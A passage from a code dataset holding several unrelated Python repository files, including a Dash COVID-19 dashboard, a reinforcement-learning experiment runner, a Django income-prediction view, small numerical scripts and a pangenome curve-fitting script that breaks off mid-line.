0)\n df5 = df5.mask(df5 < 0)\n\n figure={\n \n 'data': [\n \n {'x': df5.index, 'y': df5, 'type': 'line', 'name': 'deaths', 'marker': {'color': 'orange'}},\n\n ],\n 'layout': {\n 'title': 'Deaths',\n 'paper_bgcolor': '#082255',\n 'plot_bgcolor': '#082255',\n 'font': {'color': 'white'},\n }}\n\n return(figure)\n\n@app.callback(Output('total_cases', 'children'),\n [Input('my-dropdown2', 'value')])\n\ndef update_contetnt(value):\n\n # New DataFrame\n dff = df_states[df_states['state'] == value]\n\n # Case and Death Totals\n t_cases = dff['cases'].iloc[-1]\n t_deaths = dff['deaths'].iloc[-1]\n\n # Case Calculations\n dff2 = dff.set_index('date')\n dff2 = dff2['cases'].diff()\n dff2 = dff2.dropna()\n\n average_cases = dff2.mean()\n average_cases = round(average_cases)\n\n case_percent = (dff['cases'].iloc[-1] - dff['cases'].iloc[-5]) / dff['cases'].iloc[-5] * 100\n case_percent = round(case_percent, 2)\n \n month_cases = (dff['cases'].iloc[-1] - dff['cases'].iloc[-30]) / dff['cases'].iloc[-30] * 100\n month_cases = round(month_cases, 2)\n\n average_5_cases = dff2.tail()\n average_5_cases = round(average_5_cases.mean())\n\n average_30_cases = dff2.tail(30)\n average_30_cases = round(average_30_cases.mean())\n\n # Death Calculations\n dff3 = dff.set_index('date')\n dff3 = dff3['deaths'].diff()\n dff3 = dff3.dropna()\n\n average_deaths = dff3.mean()\n average_deaths = round(average_deaths)\n\n death_percent = (dff['deaths'].iloc[-1] - dff['deaths'].iloc[-5]) / dff['deaths'].iloc[-5] * 100\n death_percent = round(death_percent, 2)\n \n month_deaths = (dff['deaths'].iloc[-1] - dff['deaths'].iloc[-30]) / dff['deaths'].iloc[-30] * 100\n month_deaths = round(month_deaths, 2)\n\n average_5_deaths = dff3.tail()\n average_5_deaths = round(average_5_deaths.mean())\n\n average_30_deaths = dff3.tail(30)\n average_30_deaths = round(average_30_deaths.mean())\n\n return(\n # HTML TABLE\n html.Table([\n html.Tr([\n # Headers\n html.Th(' '),\n html.Th('Cases'),\n html.Th('Deaths'),\n\n ] ),\n\n html.Tr([\n #Total\n html.Td('Total:'),\n html.Td('{:,}'.format(t_cases)),\n html.Td('{:,}'.format(t_deaths)),\n\n ] ),\n \n html.Tr([\n #Average per day\n html.Td('Daily Average:'),\n html.Td('{:,}'.format(average_cases)),\n html.Td('{:,}'.format(average_deaths)),\n\n ] ),\n\n html.Tr([\n # Average 5 Days\n html.Td('Average Last 5 Days:'),\n html.Td('{:,}'.format(average_5_cases)),\n html.Td('{:,}'.format(average_5_deaths)),\n\n ] ),\n \n html.Tr([\n # Average 30 Days\n html.Td('Average Last 30 Days:'),\n html.Td('{:,}'.format(average_30_cases)),\n html.Td('{:,}'.format(average_30_deaths)),\n\n ] ),\n\n html.Tr([\n # Change 5 Days\n html.Td('% Change 5 Days:'),\n html.Td('{:,}%'.format(case_percent)),\n html.Td('{:,}%'.format(death_percent)),\n ] ),\n \n html.Tr([\n #Change 30 Days\n html.Td('% Change 30 Days:'),\n html.Td('{:,}%'.format(month_cases)),\n html.Td('{:,}%'.format(month_deaths)),\n\n ] ),\n\n ] ),\n )\n\n# Graph 2\n\n@app.callback(Output('graph_2', 'figure'),\n [Input('my-dropdown2', 'value'), Input('r_button', 'value')])\n\n\ndef update_figure(value, button):\n\n\n if button == 'BOTH':\n\n df3 = df_states[df_states['state'] == value]\n \n df3 = df3.set_index('date')\n \n df4 = df3['cases'].diff()\n df5 = df3['deaths'].diff()\n\n df4 = df4.mask(df4 < 0)\n df5 = df5.mask(df5 < 0)\n\n df4 = df4.tail()\n df5 = df5.tail()\n\n figure={\n \n 'data': [\n \n {'x': df4.index, 'y': df4, 'type': 'bar', 'name': 'cases'},\n {'x': df5.index, 'y': df5, 'type': 'bar', 'name': 'deaths'},\n\n ],\n 'layout': {\n 'title': 'Last 5 Days',\n 'height': '300',\n 'xaxis': {'tickformat': '%b %d, %Y'},\n 'xaxis': {'maxnumberoflabels': '5'},\n 'paper_bgcolor': '#082255',\n 'plot_bgcolor': '#082255',\n 'font': {'color': 'white'} \n \n }}\n\n return(figure)\n\n elif button == 'CASES':\n\n df3 = df_states[df_states['state'] == value]\n \n df3 = df3.set_index('date')\n \n df4 = df3['cases'].diff()\n df5 = df3['deaths'].diff()\n\n df4 = df4.mask(df4 < 0)\n df5 = df5.mask(df5 < 0)\n\n df4 = df4.tail()\n \n figure={\n \n 'data': [\n \n {'x': df4.index, 'y': df4, 'type': 'bar', 'name': 'cases'},\n {'x': df4.index, 'y': df4, 'type': 'line', 'marker': {'color': 'black'}},\n\n ],\n 'layout': {\n 'title': 'Cases Last 5 Days', \n 'xaxis': {'tickformat': '%b %d, %Y'},\n 'xaxis': {'maxnumberoflabels': '5'},\n 'paper_bgcolor': '#082255',\n 'plot_bgcolor': '#082255',\n 'font': {'color': 'white'} \n }}\n\n\n return(figure)\n \n elif button == 'DEATH':\n\n df3 = df_states[df_states['state'] == value]\n \n df3 = df3.set_index('date')\n \n df4 = df3['cases'].diff()\n df5 = df3['deaths'].diff()\n\n df4 = df4.mask(df4 < 0)\n df5 = df5.mask(df5 < 0)\n\n df5 = df5.tail()\n\n figure={\n \n 'data': [\n \n {'x': df5.index, 'y': df5, 'type': 'bar', 'name': 'deaths', 'marker': {'color': 'orange'}},\n {'x': df5.index, 'y': df5, 'type': 'line', 'marker': {'color': 'black'}},\n\n ],\n 'layout': {\n 'title': 'Deaths Last 5 Days', \n 'xaxis': {'tickformat': '%b %d, %Y'},\n 'xaxis': {'maxnumberoflabels': '5'},\n 'paper_bgcolor': '#082255',\n 'plot_bgcolor': '#082255',\n 'font': {'color': 'white'} \n \n }}\n\n return(figure)\n\n########################################################\n\napp.config.suppress_callback_exceptions=True\n\nserver = app.server\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n","repo_name":"chadless1/c19-stats-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":20735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"32787378023","text":"import numpy as np\nimport sys\nimport plotting as plotting\nfrom matplotlib import pyplot as plt\nfrom matplotlib.patches import Rectangle\nfrom matplotlib import pylab\nimport matplotlib.gridspec as gridspec\nimport time\n\nclass Experiment(object):\n def __init__(self, env, agent, EPISODES=1000, training=True, episode_max_length=None, mean_episodes=10, stop_criterion=100):\n self.start_time = time.time()\n self.env = env\n self.agent = agent\n self.EPISODES = EPISODES\n self.training = training\n self.episode_max_length = episode_max_length\n self.mean_episodes = mean_episodes\n self.stop_criterion = stop_criterion\n self.high_score = 0\n \n self.episode_length = np.array([0])\n self.episode_reward = np.array([0])\n \n # Partie graphique\n self.fig = pylab.figure(figsize=(10, 5))\n gs = gridspec.GridSpec(2, 2)\n self.ax = pylab.subplot(gs[:, 0])\n self.ax.xaxis.set_visible(False)\n self.ax.yaxis.set_visible(False)\n \n if hasattr(self.env, '_cliff'): # Hardcode to nicely display grid for cliffwalkingenv\n self.ax.xaxis.set_visible(True)\n self.ax.yaxis.set_visible(True)\n self.ax.set_xticks(np.arange(-.5, 12, 1), minor=True);\n self.ax.set_yticks(np.arange(-.5, 4, 1), minor=True);\n self.ax.grid(which='minor', color='w', linestyle='-', linewidth=1)\n \n if hasattr(self.env, 'winds'): # Hardcode to nicely display grid for windygridworldenv\n self.ax.xaxis.set_visible(True)\n self.ax.yaxis.set_visible(True)\n self.ax.set_xticks(np.arange(-.5, 10, 1), minor=True);\n self.ax.set_yticks(np.arange(-.5, 7, 1), minor=True);\n self.ax.grid(which='minor', color='w', linestyle='-', linewidth=1)\n \n self.ax1 = pylab.subplot(gs[0, 1])\n self.ax1.yaxis.set_label_position(\"right\")\n self.ax1.set_ylabel('Length')\n \n self.ax1.set_xlim(0, max(10, len(self.episode_length)+1))\n self.ax1.set_ylim(0, 51)\n \n self.ax2 = pylab.subplot(gs[1, 1])\n self.ax2.set_xlabel('Episode')\n self.ax2.yaxis.set_label_position(\"right\")\n self.ax2.set_ylabel('Reward')\n self.ax2.set_xlim(0, max(10, len(self.episode_reward)+1))\n self.ax2.set_ylim(0, 2)\n \n self.line, = self.ax1.plot(range(len(self.episode_length)),self.episode_length)\n self.line2, = self.ax2.plot(range(len(self.episode_reward)),self.episode_reward)\n \n def update_display_step(self, step = None):\n if not hasattr(self, 'imgplot'):\n self.imgplot = self.ax.imshow(self.env.render(mode='rgb_array'), interpolation='none', cmap='viridis')\n else:\n self.imgplot.set_data(self.env.render(mode='rgb_array'))\n \n self.fig.canvas.draw()\n #if not self.training:\n # time.sleep(0.05) #5/100 de seconde\n \n \n def update_display_episode(self): \n self.line.set_data(range(len(self.episode_length)),self.episode_length)\n self.ax1.set_xlim(0, max(10, len(self.episode_length)+1))\n self.ax1.set_ylim(0, max(self.episode_length)+1)\n \n self.line2.set_data(range(len(self.episode_reward)),self.episode_reward)\n self.ax2.set_xlim(0, max(10, len(self.episode_reward)+1))\n self.ax2.set_ylim(min(self.episode_reward)-1, max(self.episode_reward)+1)\n \n self.fig.canvas.draw() \n \n def start_run(self):\n self.start_time = time.time()\n start_time_display = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n self.agent.log(\"--------------------------------------------------------\")\n self.agent.log(f\"Nouvelle séquence de {self.EPISODES} épisodes, débutée le {start_time_display}...\")\n self.agent.log(\"--------------------------------------------------------\")\n self.high_score = 0\n if not self.training:\n self.agent.log(\"> Mode REPLAY\")\n \n def end_run(self):\n # Enregistrer le modèle à la fin\n if self.training:\n self.agent.saveModel()\n \n running_total_seconds = round(time.time() - self.start_time, 0)\n running_total_minutes = round(running_total_seconds / 60, 1)\n self.agent.log(f\"- Temps de traitement: {running_total_minutes} minutes\")\n self.agent.log(\"--------------------------------------------------------\")\n self.agent.log(\"\", flushBuffer=True)\n \n def run_qlearning(self, interactive = False, display_frequency=1, save_model_each_n_episodes = 50, time_penalty=0, life_penalty=0):\n self.start_run()\n \n BYTE_VIE = 57\n\n # repeat for each episode\n for episode_number in range(self.EPISODES):\n \n # initialize state \n state = self.env.reset()\n \n done = False # used to indicate terminal state\n R = 0 # used to display accumulated rewards for an episode\n t = 0 # used to display accumulated steps for an episode i.e episode length\n \n # repeat for each step of episode, until state is terminal\n while not done:\n \n t += 1 # increase step counter - for display\n \n # choose action from state using policy derived from Q\n action = self.agent.act(state)\n \n # take action, observe reward and next state\n next_state, reward, done, _ = self.env.step(action)\n\n # Pénaliser le fait de ne rien faire pour éviter des épisodes qui s'étirent\n learning_reward = reward\n \n # Après discussions avec Mikael, ne pas pénaliser l'inaction ou les vies\n if learning_reward == 0:\n vies_actuelles = state[BYTE_VIE]\n vies_apres = next_state[BYTE_VIE]\n if vies_apres < vies_actuelles:\n #print(\"vie perdue\")\n learning_reward = -life_penalty # Pénaliser fortement la perte de vie\n else:\n learning_reward = -time_penalty # Pénaliser légèrement l'inaction\n \n # agent learn (Q-Learning update)\n if self.training:\n self.agent.learn(state, action, learning_reward, next_state, done)\n \n # state <- next state\n state = next_state\n \n R += reward # accumulate reward - for display\n \n # if interactive display, show update for each step \n #if self.training and interactive:\n self.update_display_step(t)\n \n # If cancel requested, exit\n if self.agent.isCancelRequested():\n self.agent.log(\"*** Arrêt demandé détecté ***\", flushBuffer=True)\n break;\n\n \n self.episode_length = np.append(self.episode_length,t) # keep episode length - for display\n self.episode_reward = np.append(self.episode_reward,R) # keep episode reward - for display \n\n\n if R > 0:\n self.agent.log(f\"Épisode {episode_number+1}/{self.EPISODES}: R={R}, Steps={t}\", doPrint=not interactive)\n \n # Update image of highest score only\n if interactive:\n if R >= self.high_score:\n self.update_display_step()\n self.update_display_episode()\n \n if R > self.high_score:\n self.high_score = R\n self.agent.log(f\"\\tNouveau meilleur score à: {self.high_score}, épisode #{episode_number + 1}\", flushBuffer=True)\n \n # Sauvegarde du modèle tous les n épisodes\n if self.training and save_model_each_n_episodes != None and (episode_number + 1) % save_model_each_n_episodes == 0:\n self.agent.saveModel()\n \n # if interactive display, show update for the episode\n if not self.training and interactive:\n self.update_display_episode()\n \n # If cancel requested, exit\n if self.agent.isCancelRequested():\n self.agent.log(\"*** Arrêt demandé par l'usager ***\", flushBuffer=True)\n break;\n \n \n # if interactive display, show graph at the end\n if interactive:\n self.update_display_episode()\n \n else:\n self.fig.clf()\n stats = plotting.EpisodeStats(\n episode_lengths=self.episode_length,\n episode_rewards=self.episode_reward,\n episode_running_variance=np.zeros(self.EPISODES))\n plotting.plot_episode_stats(stats, display_frequency)\n \n self.agent.log(\"\")\n self.agent.log(f\"Fin des épisodes\")\n self.agent.log(f\"Meilleur score obtenu: {self.high_score}\")\n self.agent.log(f\"Durée moyenne: {round(np.average(self.episode_length), 1)} actions\")\n self.agent.log(f\"Score moyen: {round(np.average(self.episode_reward), 2)} points\")\n self.agent.log(\"\", flushBuffer=True)\n \n self.end_run()\n \n \n def run_actorcritic(self):\n self.start_run()\n \n # Tableaux utiles pour l'affichage\n scores, mean, episodes, lengths = [], [], [], []\n \n plt.ion()\n fig_size = plt.rcParams[\"figure.figsize\"]\n fig_size[0] = 8\n fig_size[1] = 7\n \n fig1, (ax1_1, ax1_2, ax1_3) = plt.subplots(3, sharex=True)\n fig1.canvas.draw()\n\n for i in range(self.EPISODES):\n done = False\n score = 0\n state = self.env.reset()\n\n counter = 0\n while not done:\n counter +=1\n\n # Afficher l'environnement\n if self.agent.render:\n self.env.render()\n\n # Obtient l'action pour l'état courant\n action = self.agent.act(state)\n\n # Effectue l'action\n next_state, reward, done, _ = self.env.step(action)\n\n self.agent.learn(state, action, reward, next_state, done )\n\n # Mise à jour de l'état\n state = next_state\n\n # Accumulation des récompenses\n score += reward\n\n # Arrête l'épisode après 'episode_max_length' instants\n if self.episode_max_length != None and counter >= self.episode_max_length:\n done = True\n \n \n if score > self.high_score:\n self.high_score = score\n self.agent.log(f\"\\tNouveau meilleur score à: {self.high_score}, épisode #{i + 1}\", flushBuffer=True)\n \n # Arrête l'entraînement lorsque la moyenne des récompense sur 'mean_episodes' épisodes est supérieure à \n if np.mean(scores[-self.mean_episodes:]) > self.stop_criterion:\n break\n\n # Sauvegarde du modèle (poids) tous les 25 épisodes\n if self.training and (i + 1) % 25 == 0:\n self.agent.saveModel()\n self.agent.log(f\"\\tÉpisode {i + 1}\", flushBuffer=True)\n \n # Affichage des récompenses obtenues\n if self.training == True:\n scores.append(score)\n mean.append(np.mean(scores[-self.mean_episodes:]))\n episodes.append(i)\n lengths.append(counter)\n \n ax1_1.clear()\n ax1_1.plot(episodes, scores, 'b', label='gains')\n \n ax1_2.clear()\n ax1_2.plot(episodes, mean, 'r', label='Moyenne des gains')\n \n ax1_3.clear()\n ax1_3.plot(episodes, lengths, 'g', label='Durée')\n \n fig1.canvas.draw()\n \n #ax1_1.set_xlabel(\"Épisodes\")\n ax1_1.set_ylabel(\"Gains\")\n #ax1_2.set_xlabel(\"Épisodes\")\n ax1_2.set_ylabel(\"Moyenne des gains\")\n ax1_3.set_xlabel(\"Épisodes\")\n ax1_3.set_ylabel(\"Durée\")\n #plt.legend(loc='upper left')\n \n # If cancel requested, exit\n if self.agent.isCancelRequested():\n self.agent.log(\"*** Arrêt demandé par l'usager ***\", flushBuffer=True)\n break;\n \n self.agent.log(\"\")\n self.agent.log(f\"Fin des épisodes\")\n self.agent.log(f\"- Meilleur score obtenu: {self.high_score}\")\n self.agent.log(f\"- Durée moyenne: {round(np.average(lengths), 1)} actions\")\n self.agent.log(f\"- Score moyen: {round(np.average(scores), 2)} points\")\n self.agent.log(\"\", flushBuffer=True)\n \n self.end_run()","repo_name":"jsparent/ai-rl","sub_path":"breakout/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":13153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"11237101986","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom sklearn.externals import joblib\n\n# Create your views here.\ndef index(req):\n\treturn render(req, 'Web/index.html', {})\n\ndef process(req):\n\twcs = ['Federal-gov', 'Local-gov', 'Never-worked', 'Not-worked', 'Private', 'Self-emp-inc', 'Self-emp-not-inc', 'State-gov', 'Without-pay']\n\tedus = ['10th', '11th', '12th', '1th-4th', '5th-6th', '7th-8th', '9th', 'Assoc-acdm', 'Assoc-voc', 'Bachelors', 'Doctorate', 'HS-grad', 'Masters', 'Preschool', 'Prof-school', 'Some-college']\n\tmss = ['Divorced', 'Married-af-spouse', 'Married-civ-spouse', 'Married-spouse-absent', 'Never-married', 'Separated', 'Widowed']\n\tocs = ['Adm-clerical', 'Armed-Forces', 'Craft-repair',\n\t\t'Exec-managerial', 'Farming-fishing', 'Handlers-cleaners', 'Machine-op-inspct', 'None', 'Other-service', 'Priv-house-serv', 'Prof-specialty', 'Protective-serv', 'Sales',\n\t\t'Tech-support', 'Transport-moving']\n\trels = ['Husband', 'Not-in-family', 'Other-relative', 'Own-child', 'Unmarried', 'Wife']\n\trcs = ['Amer-Indian-Eskimo', 'Asian-Pac-Islander', 'Black', 'Other', 'White']\n\tsxs = ['Female', 'Male']\n\tncs = ['Cambodia', 'Canada', 'China', 'Columbia', 'Cuba', 'Dominican-Republic', 'Ecuador', 'El-Salvador', 'England', 'France', 'Germany', 'Greece', 'Guatemala', 'Haiti',\n\t\t'Holand-Netherlands', 'Honduras', 'Hong', 'Hungary', 'India', 'Iran', 'Ireland', 'Italy', 'Jamaica', 'Japan', 'Laos', 'Mexico', 'Nicaragua', 'Other-country',\n\t\t'Outlying-US(Guam-USVI-etc)', 'Peru', 'Philippines', 'Poland', 'Portugal', 'Puerto-Rico', 'Scotland', 'South', 'Taiwan', 'Thailand', 'Trinadad&Tobago', 'United-States',\n\t\t'Vietnam', 'Yugoslavia']\n\tage = req.POST['age']\n\tfnlwgt = req.POST['fnlwgt']\n\tedunum = req.POST['education-num']\n\tgain = req.POST['capital-gain']\n\tloss = req.POST['capital-loss']\n\thours = req.POST['hours-per-week']\n\tworkclass = wcs.index(req.POST['workclass'])\n\tedu = edus.index(req.POST['education'])\n\tmarital = mss.index(req.POST['marital-status'])\n\tocc = ocs.index(req.POST['occupation'])\n\trelationship = rels.index(req.POST['relationship'])\n\trace = rcs.index(req.POST['race'])\n\tsex = sxs.index(req.POST['sex'])\n\tnative = ncs.index(req.POST['native-country'])\n\tinp = [int(age), int(fnlwgt), int(edunum), int(gain), int(loss), int(hours)]\n\tfor i in range(0, 102):\n\t\tinp.append(0)\n\tinp[6 + workclass] = 1\n\tinp[15 + edu] = 1\n\tinp[31 + marital] = 1\n\tinp[38 + occ] = 1\n\tinp[53 + relationship] = 1\n\tinp[59 + race] = 1\n\tinp[64 + sex] = 1\n\tinp[66 + native] = 1\n\tpred = [0]\n\tcontext = {}\n\tif (pred[0] == 0):\n\t\tcontext = {\n\t\t\t'prediction' : '<=50K'\n\t\t}\n\telse :\n\t\tcontext = {\n\t\t\t'prediction' : '>50K'\n\t\t}\n\treturn render(req, 'Web/process.html', context)","repo_name":"dewitast/Tubes-AI","sub_path":"IncomePredictionWebApp/Web/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"31367945569","text":"import numpy as np\r\nclass Linear_regression:\r\n def __init__(self,data,labels):\r\n self.standardize_data = Linear_regression.standardize(data)\r\n self.data = data\r\n self.labels = labels\r\n self.theta = np.random.rand((self.data.shape[1],1))\r\n\r\n def train(self,ETA,num_iteration = 500):\r\n cost_history = self.gradient_descend(ETA,num_iteration)\r\n return self.theta,cost_history\r\n \r\n def gradient_descend(self,ETA,num_iteration = 500):\r\n cost_history = []\r\n for _ in range(num_iteration):\r\n self.gradient_step(ETA)\r\n cost_history.append(self.cost_function(self.data,self.labels))\r\n return\r\n def cost_funtion(self,data,labels):\r\n num_example = data.shape[0]\r\n delta = Linear_regression.hypothesis(self.data,self.theta) - labels\r\n cost = (0.5 * np.dot(delta.T,delta))/num_example\r\n return cost[0][0]\r\n def gradient_step(self,ETA):\r\n num_example = self.data.shape[0]\r\n prediction = Linear_regression.hypothesis(self.data,self.theta)\r\n theta = self.theta\r\n theta = theta - ETA * (1/num_example) * (np.dot((prediction - self.labels),self.data))\r\n self.theta = theta\r\n return theta\r\n\r\n @staticmethod\r\n def hypothesis(data,theta):\r\n return np.dot(data,theta)\r\n\r\n\r\n @staticmethod\r\n def standardize(self,data):\r\n mu = np.mean(data)\r\n std = np.std(data)\r\n return (data - mu) / std ","repo_name":"kaimu11111/ML-code","sub_path":"Linear_regression.py","file_name":"Linear_regression.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"22770875105","text":"import time\nfrom multiprocessing import Process\nfrom threading import Thread\n\n\ndef get_fib(n):\n if n < 0:\n raise ValueError(f\"Invalid n: {n}.\")\n elif n == 0:\n return 0\n elif n == 1:\n return 1\n else:\n return get_fib(n - 1) + get_fib(n - 2)\n\n\ndef run_synchronously():\n def inner(n, times):\n for _ in range(times):\n get_fib(n)\n\n return inner\n\n\ndef run_parallel(executor):\n def inner(n, times):\n executors = [executor(target=get_fib, args=(n,)) for _ in range(times)]\n [ex.start() for ex in executors]\n [ex.join() for ex in executors]\n\n return inner\n\n\ndef eval_time(f, n, times):\n start_time = time.time()\n f(n, times)\n elapsed = time.time() - start_time\n return elapsed\n\n\ndef main():\n n, times = 35, 10\n\n with open(\"artifacts/fibonacci.txt\", \"w\") as file:\n file.write(f\"n={n}, times={times}\\n\")\n file.write(f\"base: {eval_time(run_synchronously(), n, times):.2f} sec\\n\")\n file.write(f\"threading: {eval_time(run_parallel(Thread), n, times):.2f} sec\\n\")\n file.write(f\"multiprocessing: {eval_time(run_parallel(Process), n, times):.2f} sec\\n\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Sushentsev/hse-advanced-python","sub_path":"hw_4/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"21369073159","text":"import numpy as np\nfrom generators import arma, toFile\n\nnp.random.seed(12345)\n\nplot = True\n\npivot = np.arange(1000) / 10\n\nslags = [0.5]\nnlags = []\nnoise0 = np.random.normal(loc=0, scale=0.5, size=(len(pivot),))\nsignal0, _ = arma(slags, nlags, pivot, noise=noise0, plot=plot)\nslags = [-0.5]\nnlags = []\nnoise1 = np.random.normal(loc=0, scale=1.5, size=(len(pivot),))\nsignal1, _ = arma(slags, nlags, pivot, noise=noise1, plot=plot)\n\n# Create two clusters by swapping the noise signals halfway through the series\nsplit = int(len(pivot) // 2)\ns0 = np.append(signal0[:split], signal1[split:])\ns1 = np.append(signal1[:split], signal0[split:])\n\nif plot:\n import matplotlib.pyplot as plt\n fig, ax = plt.subplots()\n ax.plot(pivot, s0, '.-', label='0')\n ax.plot(pivot, s1, '.-', label='1')\n ax.legend()\n plt.show()\n\n\nout = np.zeros((len(pivot), 3))\nout[:, 0] = pivot\nout[:, 1] = s0\nout[:, 2] = s1\ntoFile(out, 'Clustered_A')\n","repo_name":"idaholab/raven","sub_path":"tests/framework/ROM/TimeSeries/SyntheticHistory/TrainingData/generateClustered.py","file_name":"generateClustered.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":195,"dataset":"github-code","pt":"38"} +{"seq_id":"12825092463","text":"from rest_framework import serializers\nfrom core.models import Star\n\n\nclass StarSerializer(serializers.ModelSerializer):\n # Serializer for tags\n QuerySet = Star.objects.all()\n\n class Meta:\n model = Star\n fields = [\n 'id',\n 'name',\n 'bio',\n 'birth_day',\n 'birth_place',\n 'image'\n ]\n read_only_fields = ('id',)\n","repo_name":"ghmaimon/Soul-Rate","sub_path":"Back-End/api/star/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"30888705998","text":"from sprite import Sprite\r\nimport math\r\nimport winsound\r\nimport random\r\n\r\nclass Player(Sprite):\r\n def __init__(self, spriteshape, color, startx, starty):\r\n Sprite.__init__(self, spriteshape, color, startx, starty)\r\n self.shapesize(stretch_wid=0.8, stretch_len=1.2, outline=None)\r\n # zamiast speed jest dx i dy\r\n self.dx = 0\r\n self.dy = 0\r\n self.rotationalSpeed = 0\r\n \r\n def move(self): # nadpisanie metody move() odziedziczonej po klasie Sprite\r\n self.goto(self.xcor() + self.dx, self.ycor() + self.dy)\r\n # boundary detection\r\n if self.xcor() > 290:\r\n self.dx = - self.dx\r\n if self.xcor() < -290:\r\n self.dx = - self.dx\r\n if self.ycor() > 290:\r\n self.dy = - self.dy\r\n if self.ycor() < -290:\r\n self.dy = - self.dy\r\n\r\n def turn_left(self):\r\n self.rotationalSpeed = 30\r\n self.setheading(self.heading() + self.rotationalSpeed)\r\n\r\n def turn_right(self):\r\n self.rotationalSpeed = -30\r\n self.setheading(self.heading() + self.rotationalSpeed)\r\n\r\n def accelerate(self):\r\n self.dx += math.cos(math.radians(self.heading())) * 1 # dodaje liczbe z przedzialu <-1, 1>\r\n #print(self.dx)\r\n self.dy += math.sin(math.radians(self.heading())) * 1 # dodaje liczbe z przedzialu <-1, 1>\r\n #print(self.dy)\r\n\r\n def hyperspace(self):\r\n winsound.PlaySound('hyperspace.wav', winsound.SND_ASYNC)\r\n self.goto(random.randint(-250, 250), random.randint(-250, 250))\r\n ","repo_name":"niezwyklyable/Space-War","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"14313138593","text":"import itertools\nimport basedata\n\n\ndef all_variable_parameter_combinations(grid):\n tuples = list(itertools.product(*grid.values()))\n return [{list(grid.keys())[i]: tuple[i] for i in range(len(tuple))} for tuple in tuples]\n\n\ndef generate_basefiles(grid, template_fn):\n combos = all_variable_parameter_combinations(grid)\n template_name = template_fn.replace('.bas', '')\n for ix, combo in enumerate(combos):\n basedata.overwrite_parameters_in_basefile(template_fn, f'{template_name}{(ix + 1)}_.bas', combo)\n\n\nif __name__ == '__main__':\n pgrid = {\n 'Complexity': [1.25, 1.5, 1.8, 2.0],\n 'RRF': [0.1, 0.25, 0.5, 0.75, 0.9, 1.0],\n 'RRS': [0.125, 0.2, 0.3, 0.5, 0.7, 0.8, 1.0]\n }\n\n generate_basefiles(pgrid, 'l.bas')\n\n\n","repo_name":"0x17/SchedulingExperiments","sub_path":"basefile_generator.py","file_name":"basefile_generator.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"15247206123","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Feb 4 14:02:56 2021\r\n\r\n@author: Usuario\r\n\"\"\"\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Feb 4 13:11:38 2021\r\n@author: Carlos Caicedo-Montoya\r\n\"\"\"\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom scipy.optimize import curve_fit\r\n\r\n#Read data Pangenome\r\nmy_total_genes = pd.read_table(\"pangenome_micropan.csv\",\r\n sep=\",\", \r\n low_memory=False, header=None)\r\nmy_total_genes = my_total_genes.T\r\n\r\ntotal_genes_melted = my_total_genes.melt()\r\n\r\n\r\ngenomes = total_genes_melted.iloc[:,0]\r\ngenomes = np.asarray(genomes)\r\ngenomes = genomes + 1\r\npangenome = total_genes_melted.iloc[:,1]\r\n\r\n\r\n#Fit power law curve\r\n#PANGENOME\r\n\r\ndef pangenome_fit(x, gamma, G0):\r\n return G0*(x**gamma)\r\nparameters_pan, parameters_cov_pan = curve_fit(pangenome_fit,\r\n genomes,\r\n pangenome, p0=[1, 1])\r\n\r\n#Generate curves with the fit parameters3\r\n##Core genome\r\ngamma = parameters_pan[0]\r\npan0 = parameters_pan[1]\r\n\r\ngenomes_curve = np.linspace(1, max(genomes))\r\npangenome_curve = pan0*(genomes_curve**gamma)\r\nerr_pan = np.sqrt(np.diag(parameters_cov_pan))\r\n\r\n\r\n#Read data New genes\r\nmy_new_genes = pd.read_table(\"new_genes_micropan.csv\",\r\n sep=\",\", \r\n low_memory=False, header=None)\r\nmy_new_genes = my_new_genes.T\r\nnew_genes_melted = my_new_genes.melt()\r\n\r\ngenomes_new = new_genes_melted.iloc[:,0]\r\ngenomes_new = np.asarray(genomes_new)\r\ngenomes_new = genomes_new + 1\r\nnew_genes = new_genes_melted.iloc[:,1]\r\n\r\ndef new_genes_fit(x, alpha, G0):\r\n return G0*(x**alpha)\r\nparameters_new, parameters_cov_new = curve_fit(new_genes_fit,\r\n genomes_new,\r\n new_genes, p0=[1, 1])\r\n\r\n#Generate curves with the fit parameters3\r\n##Core genome\r\nalpha = parameters_new[0]\r\nnew0 = parameters_new[1]\r\n\r\ngenomes_curve_new = np.linspace(1, max(genomes_new))\r\nnew_genes_curve = new0*(genomes_curve_new**alpha)\r\nerr_core = np.sqrt(np.diag(parameters_cov_new))\r\n\r\n\r\n\r\n#Plots\r\nfig, ax = plt.subplots()\r\nax.plot(genomes, pangenome, '+', color = \"bisque\")\r\nax.plot(genomes_curve, pangenome_curve, 'darkorange', label = \"Total\")\r\nax.plot(genomes_new, new_genes, '+', color = \"khaki\")\r\nax.plot(genomes_curve, 